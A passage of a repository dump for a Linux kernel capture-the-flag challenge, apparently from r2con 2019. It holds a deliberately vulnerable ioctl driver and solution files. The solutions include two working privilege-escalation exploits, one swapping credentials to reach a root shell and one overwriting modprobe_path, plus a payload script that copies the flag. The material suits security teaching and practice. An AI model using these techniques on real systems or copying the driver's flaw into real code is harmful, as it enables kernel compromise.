190 | 	sock_connect(fds[1], "socks");
191 | 
192 | 	sock_listen(fds[2],  "socks2");
193 | 	sock_connect(fds[3], "socks2");
194 | 
195 | 	ptr = mmap(0, 0x2000, PROT_READ | PROT_WRITE, MAP_SHARED | MAP_ANONYMOUS, -1, 0);
196 | 	int ret1 = mprotect(ptr + 0x1000, 0x1000, PROT_NONE);
197 | 
198 | 	uint64_t addr = leak();
199 | 
200 | 	uint64_t fds3 = 0;
201 | 
202 | 	for(int i=0; i < 256; i+= 8) {
203 | 		uint64_t data = read64(addr + i);
204 | 		if (data == 0x4141414141414100) {
205 | 			/* found fds[3] ! */
206 | 			fds3 = addr + i;
207 | 		}
208 | 	}
209 | 
210 | 	if (!fds3) {
211 | 		printf("[!] Failed to find fds[3]\n");
212 | 		exit(0);
213 | 	}
214 | 
215 | 	printf("[*] fds[3] sock_buf_t at %lx\n", fds3);
216 | 	uint64_t target = fds3 - 4*0x20;
217 | 
218 | 	/*
219 | 	 * Alright we've got a leak, let's find out where the kernel is.
220 | 	 */
221 | 
222 | 	/* Close spray_fd[999] and replace it by a shm_file_data */
223 | 
224 | 	close(spray_fd[999]);
225 | 
226 | #ifndef USE_SHMEM_LEAK
227 | 	int fdx = open("/proc/self/stat", O_RDONLY);
228 | 
229 | 	uint64_t single_start = read64(target);
230 | 	uint64_t kbase = single_start - SINGLE_START;
231 | 	printf("[*] Kernel base: 0x%lx\n", kbase);
232 | 
233 | #else 
234 | 
235 | 	shm_ptr = (int *) shmat(shm_id, NULL, 0);  /* attach */
236 | 	if ((int) shm_ptr == -1) {
237 | 	     printf("*** shmat error (server) ***\n");
238 | 	     exit(1);
239 | 	}
240 | 
241 | 	
242 | 	
243 | 	uint64_t shmem_vm_ops = read64(target+8);
244 | 	uint64_t init_ipc_ns = read64(target+24);
245 | 
246 | 	uint64_t kbase = shmem_vm_ops - SHMEM_VM_OPS;
247 | 	printf("[*] Kernel base: 0x%lx\n", kbase);
248 | #endif 
249 | 
250 | 	/* Change our name to pwnypwny */
251 | 	prctl(PR_SET_NAME,"pwnypwny",NULL,NULL,NULL);
252 | 
253 | 	char buf[17] = {0};
254 | 
255 | 	/* Extract init_cred from init_task */
256 | 	uint64_t init_task = kbase + INIT_TASK;
257 | 	uint64_t init_cred = read64(init_task + CRED);
258 | 
259 | 	/* Find our task by name.  */
260 | 	uint64_t current = init_task;
261 | 
262 | 	do {
263 | 		*(uint64_t *)&buf[0] = read64(current + COMM);
264 | 		*(uint64_t *)&buf[8] = read64(current + COMM + 8);
265 | 
266 | 		if (strcmp(buf, "pwnypwny") == 0) {
267 | 			break;
268 | 		}
269 | 
270 | 		current = read64(current + TASKS) - TASKS;
271 | 	} while (current != init_task);
272 | 
273 | 
274 | 	if (current == init_task ) {
275 | 		printf("[*] Failed to find ourselves...\n");
276 | 		exit(0);
277 | 	}
278 | 
279 | 
280 | 	/*
281 | 	 * Replace our creds by those of init. We read the first qword 
282 | 	 * and increment it by 10. This increases the cred refcount by 
283 | 	 * 10, making sure we don't cause a use-after-free when the exploit
284 | 	 * process exits.
285 | 	 */
286 | 	uint64_t init_cred_qw0 = read64(init_cred);
287 | 	write64(init_cred, init_cred_qw0 + 10);
288 | 
289 | 	write64(current + CRED, init_cred);
290 | 	write64(current + CRED + 8, init_cred);
291 | 
292 | 
293 | 	printf("[*] We are: %d\n", getuid());
294 | 
295 | 	char *args[] = {"/bin/sh", NULL};
296 | 	execve("/bin/sh", args, NULL);
297 | 
298 | 	return 0;
299 | }
300 | 


--------------------------------------------------------------------------------
/solution/exploit_modprobe_path.c:
--------------------------------------------------------------------------------
 1 | #include <stdio.h>
 2 | #include <sys/types.h>
 3 | #include <sys/stat.h>
 4 | #include <fcntl.h>
 5 | #include <sys/ioctl.h>
 6 | #include <string.h>
 7 | #include <errno.h>
 8 | #include <netinet/in.h>
 9 | #include "socks.h"
10 | 
11 | typedef struct sock_buf {
12 | 	size_t size;
13 | 	unsigned char *buffer;
14 | 	size_t read_index;
15 | 	size_t write_index;
16 | 	// Inline buffer!
17 | } sock_buf_t;
18 | 
19 | 
20 | int sock_init(int fd, size_t size) {
21 | 	return ioctl(fd, IOCTL_SOCKS_INIT, size);
22 | }
23 | 
24 | int sock_listen(int fd, char *name) {
25 | 	struct sock_name_param param;
26 | 	memset(&param, 0, sizeof(param));
27 | 	strncpy(param.name, name, sizeof(param.name) -1);
28 | 	printf("[*] Trying to listen in %s\n", param.name);
29 | 
30 | 	return ioctl(fd, IOCTL_SOCKS_LISTEN, &param);
31 | }
32 | 
33 | int sock_connect(int fd, char *name) {
34 | 	struct sock_name_param param;
35 | 	memset(&param, 0, sizeof(param));
36 | 	strncpy(param.name, name, sizeof(param.name) -1);
37 | 	printf("[*] Trying to connect to %s\n", param.name);
38 | 	return ioctl(fd, IOCTL_SOCKS_CONNECT, &param);
39 | }
40 | 
41 | int sock_send(int fd, void *buffer, size_t size) {
42 | 	struct sock_buffer_param param = { .size = size, .buffer = buffer};
43 | 	return ioctl(fd, IOCTL_SOCKS_SEND, &param);
44 | }
45 | 
46 | int sock_recv(int fd, void *buffer, size_t size) {
47 | 	struct sock_buffer_param param = { .size = size, .buffer = buffer};
48 | 	return ioctl(fd, IOCTL_SOCKS_RECV, &param);
49 | }
50 | 
51 | 
52 | int main(int argc, char const *argv[])
53 | {
54 | 
55 | 	for(int i=0; i < 0x400 - 0x10; i++) {
56 | 		// Open a bunch of size 0 (alloc size should be 0x20)
57 | 		int fd = open("/dev/socks", O_RDONLY);
58 | 		sock_init(fd, 0x0);
59 | 	}
60 | 	/* Let's have two socks */
61 | 
62 | 	int fd1 = open("/dev/socks", O_RDONLY);
63 | 	int fd2 = open("/dev/socks", O_RDONLY);
64 | 	
65 | 
66 | 	sock_init(fd1, -1);
67 | 	sock_listen(fd1, "test_socket");
68 | 	sock_init(fd2, 0x00);
69 | 	sock_connect(fd2, "test_socket");
70 | 
71 | 	char buf1[0x40] = {0};
72 | 	char buf2[0x40] = {0};
73 | 
74 | 	/* Send to fd1 => corrupt buffer size and pointer of fd2 */
75 | 	
76 | 	sock_buf_t buf;
77 | 	buf.size = 0x100;
78 | 	buf.buffer = 0xffffffff82023ae0L; // modprobe path
79 | 	buf.read_index = 0x00;
80 | 	buf.write_index = 0x00;
81 | 	sock_send(fd2, &buf, sizeof(buf));
82 | 
83 | 	/* NOW THIS PERFORMS ARBITRARY WRITE */
84 | 	char pwn[] = "/home/user/pwn.sh";
85 | 	sock_send(fd1, pwn, sizeof(pwn));
86 | 
87 | 
88 | 	/* Trigger launch of pwn.sh */
89 | 	socket(AF_INET,SOCK_STREAM,132);
90 | 
91 | 	return 0;
92 | }
93 | 


--------------------------------------------------------------------------------
/solution/images/corrupted_ptr.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/esanfelix/r2con2019-ctf-kernel/8f8fa1e9f84d52daabc63275c57c8436a7c56354/solution/images/corrupted_ptr.png


--------------------------------------------------------------------------------
/solution/images/data_sent.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/esanfelix/r2con2019-ctf-kernel/8f8fa1e9f84d52daabc63275c57c8436a7c56354/solution/images/data_sent.png


--------------------------------------------------------------------------------
/solution/images/normal_alloc.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/esanfelix/r2con2019-ctf-kernel/8f8fa1e9f84d52daabc63275c57c8436a7c56354/solution/images/normal_alloc.png


--------------------------------------------------------------------------------
/solution/images/ovf.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/esanfelix/r2con2019-ctf-kernel/8f8fa1e9f84d52daabc63275c57c8436a7c56354/solution/images/ovf.png


--------------------------------------------------------------------------------
/solution/images/setup.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/esanfelix/r2con2019-ctf-kernel/8f8fa1e9f84d52daabc63275c57c8436a7c56354/solution/images/setup.png


--------------------------------------------------------------------------------
/solution/pwn.sh:
--------------------------------------------------------------------------------
1 | #!/bin/sh
2 | id > /tmp/pwn3d
3 | cp /flag.txt /home/user/flag.txt
4 | chmod 777 /home/user/flag.txt
5 | 


--------------------------------------------------------------------------------
/solution/socks.h:
--------------------------------------------------------------------------------
 1 | #ifndef __SOCKS_H__
 2 | 
 3 | #include <stdint.h>
 4 | #include <sys/ioctl.h>
 5 | 
 6 | #define __SOCKS_H__
 7 | 
 8 | struct sock_name_param {
 9 | 	char name[64];
10 | };
11 | 
12 | struct sock_buffer_param {
13 | 	uint64_t size;
14 | 	void *buffer;
15 | };
16 | 
17 | #define IOCTL_SOCKS_INIT			_IOWR('s', 1, uint64_t)
18 | #define IOCTL_SOCKS_LISTEN		_IOWR('s', 2, struct sock_name_param)
19 | #define IOCTL_SOCKS_CONNECT		_IOWR('s', 3, struct sock_name_param)
20 | #define IOCTL_SOCKS_SEND			_IOWR('s', 4, struct sock_buffer_param)
21 | #define IOCTL_SOCKS_RECV			_IOWR('s', 5, struct sock_buffer_param)
22 | #define IOCTL_SOCKS_RESIZE		_IOWR('s', 6, uint64_t)
23 | 
24 | #endif


--------------------------------------------------------------------------------
/source/Makefile:
--------------------------------------------------------------------------------
 1 | # Simple Makefile to build a simple misc driver
 2 | # Nick Glynn <Nick.Glynn@feabhas.com>
 3 | #
 4 | 
 5 | obj-m += socks.o
 6 | KDIR ?= /lib/modules/$(shell uname -r)/build
 7 | PWD := $(shell pwd)
 8 | 
 9 | CC := $(CROSS_COMPILE)gcc
10 | 
11 | all:
12 | 		$(MAKE) -C $(KDIR) M=${shell pwd} modules
13 | 		
14 | clean:
15 | 		-$(MAKE) -C $(KDIR) M=${shell pwd} clean || true
16 | 		-rm *.o *.ko *.mod.{c,o} modules.order Module.symvers || true
17 | 


--------------------------------------------------------------------------------
/source/socks.c:
--------------------------------------------------------------------------------
  1 | #include <linux/miscdevice.h>
  2 | #include <linux/fs.h>
  3 | #include <linux/kernel.h>
  4 | #include <linux/module.h>
  5 | #include <linux/types.h>
  6 | #include <linux/list.h>
  7 | #include <linux/sched/mm.h>
  8 | #include <linux/slab.h>
  9 | #include <linux/mm.h>
 10 | #include <linux/uaccess.h>
 11 | 
 12 | #include "socks.h"
 13 | 
 14 | #include <linux/spinlock.h>
 15 | 
 16 | /* Global device to keep track of sockets */
 17 | sock_dev_t sock_device;
 18 | 
 19 | #define MAX_SIZE 0x1000
 20 | 
 21 | /*
 22 |  * Initialize a socket with a buffer of the size given in @arg.
 23 |  */
 24 | static long socks_ioctl_init(sock_t *sock, unsigned long arg) {
 25 |     uint64_t size = arg + sizeof(sock_buf_t);
 26 |     sock_buf_t *buf = NULL;
 27 |     int err = 0;
 28 | 
 29 |     // Sanity check without locking the buffer.
 30 |     if (size > MAX_SIZE) {
 31 |         return -EINVAL;
 32 |     }
 33 | 
 34 |     // First off: lock the buffer
 35 | 
 36 |     spin_lock(&sock->lock);
 37 | 
 38 |     if (sock->state != UNINITIALIZED) {
 39 |         err = -EINVAL;
 40 |         goto out_unlock;
 41 |     }
 42 | 
 43 |     buf = kzalloc(size, GFP_KERNEL);
 44 |     printk(KERN_ALERT "Allocated ptr %llx\n", buf);
 45 | 
 46 |     if (IS_ERR_OR_NULL(buf)) {
 47 |         err = (buf ? PTR_ERR(buf) : -ENOMEM);
 48 |         goto out_unlock;
 49 |     }
 50 | 
 51 |     sock->buf = buf;
 52 |     sock->buf->size = size - sizeof(sock_buf_t);
 53 |     sock->buf->write_index = 0;
 54 |     sock->buf->read_index = 0;
 55 |     sock->buf->buffer = (unsigned char *)buf + sizeof(sock_buf_t); // Buffer is inline
 56 | 
 57 |     sock->state = INITIALIZED;
 58 | 
 59 |     pr_info("Initialized socket with buffer size %lx\n", sock->buf->size);
 60 | 
 61 | 
 62 | out_unlock:
 63 |     spin_unlock(&sock->lock);
 64 |     return err;
 65 | }
 66 | 
 67 | /*
 68 |  * Find a socket with the given name in the listening list.
 69 |  */
 70 | static sock_t *socks_find_listening_device(char *name) {
 71 |     pr_info("Searching for socket %s\n", name);
 72 |     sock_t *s = NULL;
 73 | 
 74 |     list_for_each_entry ( s , &sock_device.listening, listening_list ) {
 75 |         if (!strcmp(s->name, name)) {
 76 |             return s;
 77 |         }
 78 |     } 
 79 | 
 80 |     return NULL;
 81 | }
 82 | 
 83 | /*
 84 |  * Handler for the ioctl command. If successful, the 
 85 |  * socket will be listening with the provided name after its 
 86 |  * execution
 87 |  */
 88 | 
 89 | static long socks_ioctl_listen(sock_t *sock, unsigned long arg) {
 90 |     struct sock_name_param * __user user_param = (struct sock_name_param * __user)arg;
 91 |     struct sock_name_param local_param, *param = &local_param;
 92 |     int err = 0;
 93 | 
 94 |     /* Fail if copy_from_user is bad */
 95 |     if (copy_from_user(param, user_param, sizeof(*param))) {
 96 |         return -EFAULT;
 97 |     }
 98 | 
 99 |     /* Make sure we null-terminate the string */
100 |     param->name[sizeof(param->name) -1] = '\0';
101 | 
102 |     pr_info("Length of name: %d\n", strlen(param->name));
103 | 
104 | 
105 |     spin_lock(&sock->lock);
106 | 
107 |     /*
108 |      * Not allowed to listen unless we are in initialized
109 |      * state.
110 |      */
111 |     if (sock->state != INITIALIZED) {
112 |         err = -EINVAL;
113 |         goto out_unlock;
114 |     }
115 | 
116 |     /* Make sure there is no other socket with this name */
117 |     spin_lock(&sock_device.lock);
118 |     if (socks_find_listening_device(param->name)) {
119 |         err = -EINVAL;
120 |         pr_err("There's already a socket with that name");
121 |         spin_unlock(&sock_device.lock);
122 |         goto out_unlock;
123 |     }
124 | 
125 |     /* Alright, nobody else on that list. Add to the list and set to listening */
126 |     strcpy(sock->name, param->name);
127 |     sock->state = LISTENING;
128 |     list_add(&sock->listening_list, &sock_device.listening);
129 |     pr_info("Socket is now listening at %s\n", param->name);
130 |     spin_unlock(&sock_device.lock);
131 |     
132 | out_unlock:
133 |     spin_unlock(&sock->lock);
134 |     return err;
135 | }
136 | 
137 | static long socks_ioctl_connect(sock_t *sock, unsigned long arg) {
138 |     struct sock_name_param * __user user_param = (struct sock_name_param * __user)arg;
139 |     struct sock_name_param local_param, *param = &local_param;
140 |     sock_t *peer = NULL;
141 |     int err = 0;
142 | 
143 |     /* Fail if copy_from_user is bad */
144 |     if (copy_from_user(param, user_param, sizeof(*param))) {
145 |         return -EFAULT;
146 |     }
147 | 
148 |     /* Make sure we null-terminate the string */
149 |     param->name[63] = '\0';
150 | 
151 |     pr_info("Length of name: %d\n", strlen(param->name));
152 | 
153 |     spin_lock(&sock->lock);
154 | 
155 |     /*
156 |      * Not allowed to connect unless we are in initialized
157 |      * state.
158 |      */
159 |     if (sock->state != INITIALIZED) {
160 |         err = -EINVAL;
161 |         goto out_unlock;
162 |     }
163 | 
164 |     /* Find a listening socket with that name */
165 |     spin_lock(&sock_device.lock);
166 |     if ( (peer = socks_find_listening_device(param->name)) == NULL) {
167 |         pr_err("No socket with that name found");
168 |         err = -EINVAL;
169 |         spin_unlock(&sock_device.lock);
170 |         goto out_unlock;
171 |     }
172 | 
173 |     /* Remove peer from listening list */
174 |     spin_lock(&peer->lock);
175 |     list_del_init(&peer->listening_list);
176 |     spin_unlock(&sock_device.lock);
177 | 
178 |     /* Connect the two sockets */
179 |     sock->state = CONNECTED;
180 |     sock->peer = peer;
181 |     peer->peer = sock;
182 |     peer->state = CONNECTED;
183 | 
184 |     pr_info("Successfully connected to %s\n", param->name);
185 |     spin_unlock(&peer->lock);
186 | 
187 | out_unlock:
188 |     spin_unlock(&sock->lock);
189 |     return err;
190 | }
191 | 
192 | /*
193 |  * Compute the amount of data in the buffer.
194 |  */
195 | static size_t sock_buf_count(sock_buf_t *buf) {
196 |     /* write_index > read_index: then write_index-read_index */
197 |     if (buf->write_index >= buf->read_index) {
198 |         return buf->write_index - buf->read_index;
199 |     }
200 | 
201 |     /* If write_index is below read_index, we have available
202 |      * from [read_index, size) + [0, write_index).
203 |      */
204 | 
205 |     return (buf->size - buf->read_index) + buf->write_index;
206 | }
207 | 
208 | /*
209 |  * Compute how much space is left in the buffer.
210 |  */
211 | static size_t sock_buf_left(sock_buf_t *buf) {
212 |     return buf->size - sock_buf_count(buf);
213 | }
214 | 
215 | /*
216 |  * Push @size bytes from userland @buffer to @buf , if enough 
217 |  * space is left.
218 |  */
219 | static long socks_push(sock_buf_t *buf, void * __user buffer, size_t size) {
220 | 
221 |     /*
222 |      * If data doesn't fit, fail.
223 |      */
224 |     if (sock_buf_left(buf) < size) {
225 |         return -ENOMEM;
226 |     }
227 | 
228 | 
229 |     /* 
230 |      * We can write up to read_index if it's bigger than write_index,
231 |      * or up to end of buffer otherwise.
232 |      */
233 |     size_t max_write_index = (buf->read_index > buf->write_index) ? buf->read_index : buf->size;
234 |     size_t copy1_size = min(size, max_write_index - buf->write_index);
235 |     size_t prev_write_index = buf->write_index;
236 | 
237 |     if (copy_from_user(buf->buffer + buf->write_index, buffer, copy1_size)) {
238 |         return -ENOMEM;
239 |     }
240 | 
241 |     /* Update our write index */
242 |     buf->write_index = (buf->write_index + copy1_size) % buf->size;
243 | 
244 |     /* More to copy, this time to beginning of buffer */
245 |     if (size > copy1_size) {
246 |         size_t copy_left = size - copy1_size;
247 |         if ( (sock_buf_left(buf) < copy_left) || 
248 |             copy_from_user(buf->buffer + buf->write_index, buffer, copy_left)) {
249 |             /* Failed to copy, roll back */
250 |             buf->write_index = prev_write_index;
251 |             return -ENOMEM;            
252 |         }
253 | 
254 |         /* Update write index again */
255 |         buf->write_index = (buf->write_index + copy_left) % buf->size;
256 |     }
257 | 
258 |     return size;
259 | }
260 | 
261 | /*
262 |  * Implement the logic to taking data out of the socket buffer.
263 |  * Reads at most @size bytes into the userland @buffer.
264 |  */
265 | static long socks_pull(sock_buf_t *buf, void * __user buffer, size_t size) {
266 | 
267 |     /* Check that the buffer has some data */
268 |     size_t count = sock_buf_count(buf);
269 |     if ( count == 0) {
270 |         return -EWOULDBLOCK;
271 |     }
272 | 
273 |     /* We are going to read as much as we can, up to size */
274 |     size_t to_read = min(count, size);
275 | 
276 |     /* Read from read_index to the end or to to_read, whatever is smaller */
277 |     size_t copy1_size = min(to_read, buf->size - buf->read_index);
278 |     size_t prev_read_index = buf->read_index;
279 | 
280 |     if (copy_to_user(buffer, buf->buffer + buf->read_index, copy1_size)) {
281 |         return -ENOMEM;
282 |     } 
283 | 
284 |     /* Update read index */
285 |     buf->read_index = (buf->read_index + copy1_size) % buf->size;
286 | 
287 |     /* Do we still have something to read? */
288 |     if (to_read > copy1_size) {
289 |         /* In this case read_index must have rolled over. WARN_ON just in case */
290 |         WARN_ON(buf->read_index != 0);
291 | 
292 |         size_t left = to_read - copy1_size;
293 |         if (copy_to_user(buffer, buf->buffer + buf->read_index, left)) {
294 |             /* Failed to copy, ignore the data and return ENOMEM */
295 |             buf->read_index = prev_read_index;
296 |             return -ENOMEM;
297 |         }
298 | 
299 |         /* Update read index again */
300 |         buf->read_index = (buf->read_index + copy1_size) % buf->size;
301 | 
302 |     }
303 | 
304 |     return (long)to_read;
305 | }
306 | 
307 | /*
308 |  * Send data to our peer.
309 |  */
310 | 
311 | static long socks_ioctl_send(sock_t *sock, unsigned long arg) {
312 |     struct sock_buffer_param * __user user_param = (struct sock_buffer_param * __user)arg;
313 |     struct sock_buffer_param local_param, *param = &local_param;
314 |     int err = 0;
315 | 
316 |     /* Fail if copy_from_user is bad */
317 |     if (copy_from_user(param, user_param, sizeof(*param))) {
318 |         return -EFAULT;
319 |     }
320 | 
321 |     spin_lock(&sock->lock);
322 | 
323 |     if (sock->state != CONNECTED) {
324 |         /* Must be connected to send! */
325 |         err = -EINVAL;
326 |         goto out_unlock_self;
327 |     }
328 | 
329 |     spin_unlock(&sock->lock);
330 | 
331 |     /* Try to push the data to the peer */
332 |     spin_lock(&sock->peer->lock);
333 |     err = socks_push(sock->peer->buf, param->buffer, param->size);
334 |     spin_unlock(&sock->peer->lock);
335 | 
336 |     return err;
337 | 
338 | out_unlock_self:
339 |     spin_unlock(&sock->lock);
340 |     return err;
341 | }
342 | 
343 | /*
344 |  * Receive data from the socket buffer.
345 |  */
346 | 
347 | static long socks_ioctl_recv(sock_t *sock, unsigned long arg) {
348 |     struct sock_buffer_param * __user user_param = (struct sock_buffer_param * __user)arg;
349 |     struct sock_buffer_param local_param, *param = &local_param;
350 |     int err = 0;
351 | 
352 |     /* Fail if copy_from_user is bad */
353 |     if (copy_from_user(param, user_param, sizeof(*param))) {
354 |         return -EFAULT;
355 |     }
356 | 
357 |     spin_lock(&sock->lock);
358 | 
359 |     if (sock->state != CONNECTED) {
360 |         /* Must be connected to receive! */
361 |         err = -EINVAL;
362 |         goto out_unlock_self;
363 |     }
364 | 
365 |     /* Try to read from the buffer */
366 |     err = socks_pull(sock->buf, param->buffer, param->size);
367 | 
368 | out_unlock_self:
369 |     spin_unlock(&sock->lock);
370 |     return err;
371 | }
372 | 
373 | /*
374 |  * Called when ioctl(fd, code, arg) is executed on an fd
375 |  * created by opening /dev/socks.
376 |  */
377 | static long socks_ioctl (struct file *file, unsigned int code, unsigned long arg) {
378 |     sock_t *sock = NULL;
379 |     
380 |     sock = (sock_t *)file->private_data;
381 | 
382 |     switch(code) {
383 |         case IOCTL_SOCKS_INIT:
384 |             return socks_ioctl_init(sock, arg);
385 |         case IOCTL_SOCKS_LISTEN:
386 |             return socks_ioctl_listen(sock, arg);
387 |         case IOCTL_SOCKS_CONNECT:
388 |             return socks_ioctl_connect(sock, arg);
389 |         case IOCTL_SOCKS_SEND:
390 |             return socks_ioctl_send(sock, arg);
391 |         case IOCTL_SOCKS_RECV:
392 |             return socks_ioctl_recv(sock, arg);
393 |         default:
394 |             return -EINVAL;
395 |     }
396 | 
397 |     return 0;
398 | }
399 | 
400 | /*
401 |  * Called when open("/dev/socks", ...) is executed.
402 |  */
403 | 
404 | static int socks_open(struct inode *inode, struct file *file)
405 | {
406 | 
407 |     sock_t *sock = kzalloc(sizeof(*sock), GFP_KERNEL);
408 |     
409 |     if (!sock)
410 |         return -ENOMEM;
411 | 
412 |     /*
413 |      * private_data is used to keep driver-specific data. The 
414 |      * kernel does not touch this field at all, so drivers can
415 |      * place their data here and get it out e.g. in ioctl.
416 |      */
417 | 
418 |     file->private_data = sock;
419 | 
420 |     /* Initialize empty listening_list head */
421 |     INIT_LIST_HEAD(&sock->listening_list);
422 |     pr_info("New socks successfully created!\n");
423 | 
424 |     return 0;
425 | }
426 | 
427 | static int socks_close(struct inode *inodep, struct file *filp)
428 | {
429 |     sock_t *sock =  (sock_t *)filp->private_data;
430 | 
431 |     spin_lock(&sock->lock);
432 | 
433 |     if (sock->state == CONNECTED ) {
434 |         /*
435 |          * If we were connected, let's make sure we disconnect 
436 |          * from the other end now.
437 |          */
438 | 
439 |         sock_t *peer = sock->peer;
440 |         sock->peer = NULL;
441 | 
442 |         spin_lock(&peer->lock);
443 |         peer->peer = NULL;
444 | 
445 |         /* Back to initialized for this peer */
446 |         peer->state = INITIALIZED;
447 |         /* Ignore any stale data */
448 |         peer->buf->write_index = 0;
449 |         peer->buf->read_index = 0;
450 | 
451 |         spin_unlock(&peer->lock);
452 | 
453 |     } else if (sock->state == LISTENING) {
454 |         /*
455 |          * If we were listening, remove from the listening list.
456 |          */ 
457 | 
458 |         spin_lock(&sock_device.lock);
459 |         list_del_init(&sock->listening_list);
460 |         spin_unlock(&sock_device.lock);
461 |     }
462 | 
463 |     if (sock->state != UNINITIALIZED) {
464 | 
465 |         /*
466 |          * Since we were initialized, we must have a buffer.
467 |          * Free it.
468 |          */
469 | 
470 |         kfree(sock->buf);
471 |     }
472 | 
473 |     spin_unlock(&sock->lock);
474 | 
475 |     /* Finally done, free our sock */
476 |     kfree(sock);
477 | 
478 |     return 0;
479 | }
480 | 
481 | static const struct file_operations socks_fops = {
482 |     .owner			= THIS_MODULE,
483 |     .open			= socks_open,
484 |     .release		= socks_close,
485 |     .llseek 		= no_llseek,
486 |     .unlocked_ioctl = socks_ioctl,
487 | };
488 | 
489 | struct miscdevice socks_device = {
490 |     .minor = MISC_DYNAMIC_MINOR,
491 |     .name = "socks",
492 |     .fops = &socks_fops,
493 | };
494 | 
495 | static int __init misc_init(void)
496 | {
497 |     int error;
498 | 
499 |     INIT_LIST_HEAD(&sock_device.listening);
500 |     spin_lock_init(&sock_device.lock);
501 | 
502 |     error = misc_register(&socks_device);
503 |     if (error) {
504 |         pr_err("can't misc_register :(\n");
505 |         return error;
506 |     }
507 | 
508 |     pr_info("I'm in\n");
509 |     return 0;
510 | }
511 | 
512 | static void __exit misc_exit(void)
513 | {
514 |     misc_deregister(&socks_device);
515 | }
516 | 
517 | module_init(misc_init)
518 | module_exit(misc_exit)
519 | 
520 | MODULE_DESCRIPTION("Module providing IPC through socks!");
521 | MODULE_AUTHOR("r2");
522 | MODULE_LICENSE("GPL");


--------------------------------------------------------------------------------
/source/socks.h:
--------------------------------------------------------------------------------
 1 | #ifndef __SOCKS_H__
 2 | 
 3 | #define __SOCKS_H__
 4 | 
 5 | #include <linux/spinlock.h>
 6 | #include <linux/types.h>
 7 | 
 8 | typedef struct sock sock_t;
 9 | 
10 | /* Describes the socket buffer after initialization */
11 | typedef struct sock_buf {
12 | 	size_t size; 			/* Size of the buffer */
13 | 	unsigned char *buffer; 	/* Pointer to data */
14 | 	size_t read_index;		/* Offset of unread data inside buffer */
15 | 	size_t write_index;		/* Offset where new data will be written */
16 | } sock_buf_t;
17 | 
18 | /* Describes a socket */
19 | typedef struct sock {
20 | 	spinlock_t lock; 				 /* Protect all fields in the structure */
21 | 	struct list_head listening_list; /* Link for the list of listening devices */
22 | 	unsigned char name[64];			 /* The name of this socket when it's listening */
23 | 	int state;						 /* The state of the socket */
24 | 	sock_t *peer;					 /* The peer we are connected to, if any */
25 | 	sock_buf_t *buf;				 /* The sock_buf_t representing this socket's data buffer */
26 | } sock_t;
27 | 
28 | typedef enum {
29 | 	UNINITIALIZED = 0,
30 | 	INITIALIZED = 1,
31 | 	LISTENING = 2,
32 | 	CONNECTED = 3,
33 | } sock_state;
34 | 
35 | /* Describes the sockets device */
36 | typedef struct sock_device {
37 | 	spinlock_t lock; 			/* Protect listening list */
38 | 	struct list_head listening; /* List of listening sockets */
39 | } sock_dev_t;
40 | 
41 | /* Parameter for listen/connect ioctls */
42 | struct sock_name_param {
43 | 	char name[64];
44 | };
45 | 
46 | /* Parameter for send/recv ioctls */
47 | struct sock_buffer_param {
48 | 	uint64_t size;
49 | 	void * __user buffer;
50 | };
51 | 
52 | /* ioctl codes */
53 | #define IOCTL_SOCKS_INIT			_IOWR('s', 1, uint64_t)
54 | #define IOCTL_SOCKS_LISTEN		_IOWR('s', 2, struct sock_name_param)
55 | #define IOCTL_SOCKS_CONNECT		_IOWR('s', 3, struct sock_name_param)
56 | #define IOCTL_SOCKS_SEND			_IOWR('s', 4, struct sock_buffer_param)
57 | #define IOCTL_SOCKS_RECV			_IOWR('s', 5, struct sock_buffer_param)
58 | #define IOCTL_SOCKS_RESIZE		_IOWR('s', 6, uint64_t)
59 | 
60 | 
61 | 
62 | #endif
63 | 


--------------------------------------------------------------------------------